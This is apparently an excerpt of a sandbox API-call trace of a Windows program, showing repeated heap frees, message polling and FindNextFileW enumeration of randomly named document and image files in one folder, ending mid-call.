[0125.478] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec30 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7eb80 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ed00 | out: hHeap=0x970000) returned 1 [0125.478] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ed30 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ed20 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9782d8 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec30 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0125.479] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec90 | out: hHeap=0x970000) returned 1 [0125.479] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7eca0 | out: hHeap=0x970000) returned 1 [0125.479] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b9e2380, ftCreationTime.dwHighDateTime=0x1d5e66c, ftLastAccessTime.dwLowDateTime=0x677f4ed0, ftLastAccessTime.dwHighDateTime=0x1d5e42f, ftLastWriteTime.dwLowDateTime=0x677f4ed0, ftLastWriteTime.dwHighDateTime=0x1d5e42f, nFileSizeHigh=0x0, nFileSizeLow=0x15985, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuSKwF8iMWxqYFgPtC.odp", cAlternateFileName="AUSKWF~1.ODP")) returned 1 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ed00 | out: hHeap=0x970000) returned 1 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a70 | out: hHeap=0x970000) returned 1 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.479] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.479] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.479] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.480] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.480] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.480] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26b597e0, ftCreationTime.dwHighDateTime=0x1d5e9c2, ftLastAccessTime.dwLowDateTime=0xbcec7dd0, ftLastAccessTime.dwHighDateTime=0x1d5ee74, ftLastWriteTime.dwLowDateTime=0xbcec7dd0, ftLastWriteTime.dwHighDateTime=0x1d5ee74, nFileSizeHigh=0x0, nFileSizeLow=0xffed, dwReserved0=0x0, dwReserved1=0x0, cFileName="aycVRCc36.ppt", cAlternateFileName="AYCVRC~1.PPT")) returned 1 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec30 | out: hHeap=0x970000) returned 1 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a70 | out: hHeap=0x970000) returned 1 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0125.480] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ebc0 | out: hHeap=0x970000) returned 1 [0125.480] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7eca0 | out: hHeap=0x970000) returned 1 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec80 | out: hHeap=0x970000) returned 1 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7eb50 | out: hHeap=0x970000) returned 1 [0125.480] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec10 | out: hHeap=0x970000) returned 1 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ecf0 | out: hHeap=0x970000) returned 1 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ece0 | out: hHeap=0x970000) returned 1 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.481] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ebd0 | out: hHeap=0x970000) returned 1 [0125.481] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec00 | out: hHeap=0x970000) returned 1 [0125.481] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51db5a40, ftCreationTime.dwHighDateTime=0x1d5e82d, ftLastAccessTime.dwLowDateTime=0x3f99d420, ftLastAccessTime.dwHighDateTime=0x1d5eea8, ftLastWriteTime.dwLowDateTime=0x3f99d420, ftLastWriteTime.dwHighDateTime=0x1d5eea8, nFileSizeHigh=0x0, nFileSizeLow=0x2a7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="cggtx8L.gif", cAlternateFileName="")) returned 1 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec30 | out: hHeap=0x970000) returned 1 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c08 | out: hHeap=0x970000) returned 1 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0125.481] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.481] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.481] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.482] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.482] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.482] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b04720, ftCreationTime.dwHighDateTime=0x1d5e1d0, ftLastAccessTime.dwLowDateTime=0x3666e8e0, ftLastAccessTime.dwHighDateTime=0x1d5ed9d, ftLastWriteTime.dwLowDateTime=0x3666e8e0, ftLastWriteTime.dwHighDateTime=0x1d5ed9d, nFileSizeHigh=0x0, nFileSizeLow=0x185aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="CSIs1Qt1V9g.jpg", cAlternateFileName="CSIS1Q~1.JPG")) returned 1 [0125.482] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.482] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.482] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.482] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.482] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.482] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0125.482] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.482] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.482] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.482] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.482] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.483] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e953d0, ftCreationTime.dwHighDateTime=0x1d5efa9, ftLastAccessTime.dwLowDateTime=0x4067da90, ftLastAccessTime.dwHighDateTime=0x1d5ed8c, ftLastWriteTime.dwLowDateTime=0x4067da90, ftLastWriteTime.dwHighDateTime=0x1d5ed8c, nFileSizeHigh=0x0, nFileSizeLow=0xa377, dwReserved0=0x0, dwReserved1=0x0, cFileName="DH-NxMw2Lrt0X14_j.pdf", cAlternateFileName="DH-NXM~1.PDF")) returned 1 [0125.483] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.483] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.483] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.483] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.483] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.483] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69416410, ftCreationTime.dwHighDateTime=0x1d5e646, ftLastAccessTime.dwLowDateTime=0x2034f840, ftLastAccessTime.dwHighDateTime=0x1d5ef42, ftLastWriteTime.dwLowDateTime=0x2034f840, ftLastWriteTime.dwHighDateTime=0x1d5ef42, nFileSizeHigh=0x0, nFileSizeLow=0x13c4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dh6CM5.flv", cAlternateFileName="")) returned 1 [0125.483] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.483] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.483] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.483] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.483] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.483] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e179da0, ftCreationTime.dwHighDateTime=0x1d5f0a1, ftLastAccessTime.dwLowDateTime=0x8cef6890, ftLastAccessTime.dwHighDateTime=0x1d5ee42, ftLastWriteTime.dwLowDateTime=0x8cef6890, ftLastWriteTime.dwHighDateTime=0x1d5ee42, nFileSizeHigh=0x0, nFileSizeLow=0x6d89, dwReserved0=0x0, dwReserved1=0x0, cFileName="E-SkW-EYmoA5t.bmp", cAlternateFileName="E-SKW-~1.BMP")) returned 1 [0125.483] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.483] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.483] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.484] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.484] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.484] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fe09ee0, ftCreationTime.dwHighDateTime=0x1d5e2da, ftLastAccessTime.dwLowDateTime=0xc350ea20, ftLastAccessTime.dwHighDateTime=0x1d5ecea, ftLastWriteTime.dwLowDateTime=0xc350ea20, ftLastWriteTime.dwHighDateTime=0x1d5ecea, nFileSizeHigh=0x0, nFileSizeLow=0x15cf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ElwQwY9lqgU4Me-0 5E.gif", cAlternateFileName="ELWQWY~1.GIF")) returned 1 [0125.484] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.484] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.484] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.484] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.484] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.484] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a2abfd0, ftCreationTime.dwHighDateTime=0x1d5ed08, ftLastAccessTime.dwLowDateTime=0x17707a50, ftLastAccessTime.dwHighDateTime=0x1d5edf7, ftLastWriteTime.dwLowDateTime=0x17707a50, ftLastWriteTime.dwHighDateTime=0x1d5edf7, nFileSizeHigh=0x0, nFileSizeLow=0x9904, dwReserved0=0x0, dwReserved1=0x0, cFileName="F Elbom0O1NrT.swf", cAlternateFileName="FELBOM~1.SWF")) returned 1 [0125.484] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.484] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.484] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.484] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.484] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.484] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f655430, ftCreationTime.dwHighDateTime=0x1d5ef86, ftLastAccessTime.dwLowDateTime=0xfafe4e70, ftLastAccessTime.dwHighDateTime=0x1d5e675, ftLastWriteTime.dwLowDateTime=0xfafe4e70, ftLastWriteTime.dwHighDateTime=0x1d5e675, nFileSizeHigh=0x0, nFileSizeLow=0x14189, dwReserved0=0x0, dwReserved1=0x0, cFileName="GHvT80V7X_pq3d.png", cAlternateFileName="GHVT80~1.PNG")) returned 1 [0125.484] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.484] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.484] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.485] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.485] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.485] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd113baf0, ftCreationTime.dwHighDateTime=0x1d5e477, ftLastAccessTime.dwLowDateTime=0xee5cf880, ftLastAccessTime.dwHighDateTime=0x1d5ed4e, ftLastWriteTime.dwLowDateTime=0xee5cf880, ftLastWriteTime.dwHighDateTime=0x1d5ed4e, nFileSizeHigh=0x0, nFileSizeLow=0x14106, dwReserved0=0x0, dwReserved1=0x0, cFileName="GUlu8dq_.pdf", cAlternateFileName="")) returned 1 [0125.485] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.485] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.485] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.485] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.485] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.485] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2cb6eb0, ftCreationTime.dwHighDateTime=0x1d5e786, ftLastAccessTime.dwLowDateTime=0x312da960, ftLastAccessTime.dwHighDateTime=0x1d5e2e2, ftLastWriteTime.dwLowDateTime=0x312da960, ftLastWriteTime.dwHighDateTime=0x1d5e2e2, nFileSizeHigh=0x0, nFileSizeLow=0xa57e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HCYfZCy ufaMx.jpg", cAlternateFileName="HCYFZC~1.JPG")) returned 1 [0125.485] PeekMessageW (in: 